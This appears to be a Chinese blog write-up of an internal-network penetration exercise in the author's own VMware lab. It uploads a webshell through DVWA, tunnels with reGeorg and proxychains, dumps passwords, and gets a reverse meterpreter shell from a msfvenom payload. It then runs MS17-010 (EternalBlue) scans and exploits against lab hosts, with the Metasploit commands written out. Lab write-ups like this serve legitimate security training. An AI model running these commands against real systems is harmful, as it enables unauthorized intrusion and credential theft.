初探内网渗透

最新推荐文章于 2024-06-07 09:40:31 发布
最新推荐文章于 2024-06-07 09:40:31 发布
阅读量422 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/108062272
版权

搭建一个内网环境,做一次简单的内网渗透

拓扑概览

图画的有些烂,基本是这样的:
0:vm1网络关闭DHCP
1:win2003充当路由器,桥接,内网IP 10.1.1.254是静态ip,10.3.139.44是自动获取的
在这里插入图片描述

2:VMware虚拟机充当交换机
3:win7是内网渗透中的内网机器,不做任何网络配置(除了连接VM1网络)
4:win2008安装phpstudy、DHCP、DNS
5:kali采用NAT连接
在这里插入图片描述
抽象来说,现在就是双内网的情况,kali在一个内网环境中,靶机在一个内网环境中,如下图所示
在这里插入图片描述

环境搭建

win2008:

phpstudy来做web服务
安装DNS
安装DHCP

开启phpstudy的openssl.dll,方面后面使用冰蝎(地址
在这里插入图片描述
其他:太繁琐,步骤略

渗透攻击

getshell

1:配置冰蝎
由于不知道原来的密码是多少,所以自己写一个密码,计算一下md5值,取值的前16位。譬如123456的md5值是e10adc3949ba59abbe56e057f20f883e,得到e10adc3949ba59ab
在这里插入图片描述
2:上传木马
直接上传冰蝎里面的文件shell.php
在这里插入图片描述
3:访问木马
所在目录如下,访问之后没有报错,就是成了

http://10.3.139.44/DVWA-master/vulnerabilities/upload/../../hackable/uploads/shell.php

4:连接冰蝎
在这里插入图片描述
5:你会发现IP不一致,再次说明,web服务架设在10.1.1.10,端口映射到了10.3.139.44
在这里插入图片描述

建立隧道

使用reGeorg来搭建HTTP隧道
1:相关文件上传至kali
在这里插入图片描述

在这里插入图片描述
2:访问顺利
在这里插入图片描述
3:使用隧道
在这里插入图片描述

配置代理

使用代理proxychains

sudo vim /etc/proxychains.conf

在这里插入图片描述

远程桌面

连接win2008proxychains rdesktop 127.0.0.1
之所以连的是win2008是因为虽然之前冰蝎查看ip的时候发现ip是win2008的,所以远程桌面时自然也是win2008,win2003只是映射了win2008的web
在这里插入图片描述
冰蝎上传GetPassword_x64.exe读取密码成功
在这里插入图片描述
在这里插入图片描述

远程登录,不太确定是什么原因,转圈圈而进不去,辗转多次仍然失败,放弃。
在这里插入图片描述

内网探测

内网主机发现,使用msf和nmap总是超时,这就很烦。一个投机取巧的方法是查看win2008的arp表,来大致确定内网主机,直接看到了win7
在这里插入图片描述

漏洞探测

直接使用永恒之蓝检测一下win7和win2008

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.1.1.10,128

在这里插入图片描述
那就用永恒之蓝把win7给搂下来,结果超时了,win7蓝屏了
在这里插入图片描述

单内网渗透

不清楚什么原因kali的NAT网卡无法上网了,没有修复好,这里更改一下网络环境,调整成单内网情况,把kali桥接一个网卡,靶机仍然保持内网,网络拓扑抽象成下图所示:
在这里插入图片描述

反弹shell

1:生成一个反弹的木马,然后使用冰蝎把木马上传win2008

 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=kali的IP lport=4444 -f exe -o re.exe

在这里插入图片描述
2:运行木马
在这里插入图片描述
3:kali开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 你kali的IP
run

拿到meterpreter,直接提权到System
在这里插入图片描述

添加路由

在这里插入图片描述

内网扫描

在meterpreter中输入run两下tab补齐会看到很多扫描方式,我这里选了基于ARP的扫描

run post/windows/gather/arp_scanner rhosts=10.1.1.0/24

扫描结果
在这里插入图片描述
已经知道win7存在永恒之蓝,直接上
在这里插入图片描述

lainwith
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nginx平台初探
03-03
众所周知,nginx性能高,而nginx的高性能与其架构是分不开的。那么nginx究竟是怎么样的呢?这一节我们先来初识一下nginx框架吧。nginx在启动后,在unix系统中会以daemon的方式在后台运行,后台进程包含一个master...
内网渗透】ARP 攻击实验
qq_62604985的博客
05-01 923
​。
kali 本地搭建DVWA渗透测试环境
26389的博客
01-21 3053
kali linux 2.0下搭建DVWA渗透测试演练平台 本文参考上文,写一写新的kali版本下的填坑问题 本人版本号: Linux 26389 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux 因为数据默认的是Mariadb所以本
把手教你如何进行内网渗透
最新发布
zzz6583zz的博客
06-07 1200
在实战中,当我们拿下了webserver,获取了webserver上的密码以及所有的域用户、本地用户、域内存活主机IP后,我们就可以以用户为用户字典、IP为IP字典、密码为密码字典,进行批量连接(碰撞),探测哪些主机可以成功连接。总结一下,FIFOs是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。但是归根结底,对于连接后的计算机的远程管理,还是要依托于VMI。
Kali渗透测试之DVWA系列9——File Inclusion(文件包含)
浅浅的博客
06-14 2896
目录 一、文件包含 二、实验环境 三、实验步骤 Windows 安全等级:LOW 安全等级:Medium 安全等级:High 安全等级:Impossible Linux 安全等级:LOW 安全等级:Medium 安全等级:High 一、文件包含 1、文件包含原理 文件包含:开发人员将相同的函数写入单独的文...
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
渗透知识-内网渗透(详细版本)
Jian Sun_的博客
02-11 3万+
1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式; 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 1.2 敏感资
渗透测试之内网渗透学习,超详细
z099164的博客
07-04 4023
渗透测试之内网渗透学习,超详细
内网渗透解析
jazzz98的博客
06-28 1683
阅读本文前需要先搞懂NAT、PAT、端口映射几个概念,内网宽带中的主机可以访问公网宽带主机,反之不可以访问;公网宽带主机可以和公网宽带主机双向访问;内网宽带中的主机和内网宽带中的主机互相无法访问。那么内网宽带中的客户机和公网宽带中的客户机如何访问另一个内网宽带中的服务器呢?这里就需要用到内网穿透技术。
redis安全攻防(专注渗透视角)
LainWith的博客
04-11 2993
数据库作为业务平台信息技术的核心和基础,承载着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,数据库的安全稳定运行也直接决定着业务系统能否正常使用。并且平台的数据库中往往储存着等极其重要和敏感的信息。这些信息一旦被篡改或者泄露,轻则造成企业经济损失,重则影响企业形象,甚至行业、社会安全。可见,数据库安全至关重要。所以对数据库的保护是一项必须的,关键的,重要的工作任务。
网络安全(黑客)内网渗透基础知识_超详细
z099164的博客
07-11 2045
网络安全(黑客)内网渗透基础知识_超详细
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 3814
内网渗透-实战|手把手教你如何进行内网渗透
内网渗透综述
kracer的博客
12-01 8478
目录 一、什么是内网渗透 二、内网基础知识 三、内网渗透基本流程 一、什么是内网渗透 内网是一个只有组织工作人员才能访问的专用网络,简而言之就是不可简单地通过外部公网ip进行访问到的公司内部网络。对于一个大型公司的网络系统,通过信息收集找到网站漏洞可以顺利通过公网进入公司内部网络时,进一步对公司内部网络的渗透攻击即为内网渗透。 与外网渗透区别: 1、外网渗透更侧重于找漏洞寻找突破口,考验的是白帽的综合能力,外网渗透的最终还是为了进入内网。 ...
内网渗透TIPS总结
Javachichi的博客
03-13 729
更可靠:更少的宕机时间。可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个更加严格的安全管理控制机制,如果你想访问域内的资源,就必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用户身份。通过域成员主机,定位出 域控制器 IP 及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进而拿下域控制器、渗透整个内网。
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1922
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
内网渗透 | 手把手教你如何进行内网渗透
mingyqf的博客
07-01 2723
发布于2020-02-17 16:42:26阅读 4K0目录结构[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Iz2F7mzJ-1656677584270)(https://ask.qcloudimg.com/http-save/yehe-5957324/0v0eirg7bb.png?imageView2/2/w/1620)]首页看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin后台尝试爆破弱口令admin1234但是找了一圈并没有发现有什么可
洋葱路由器:互联网隐私保护技术初探
"洋葱路由器 – 概述 PT 1.pdf" 洋葱路由器,通常被称为Tor(The Onion Router,洋葱路由)是一种先进的...因此,持续学习和理解Tor的工作原理,以及如何在安全渗透测试中合理使用它,对于IT专业人士来说至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值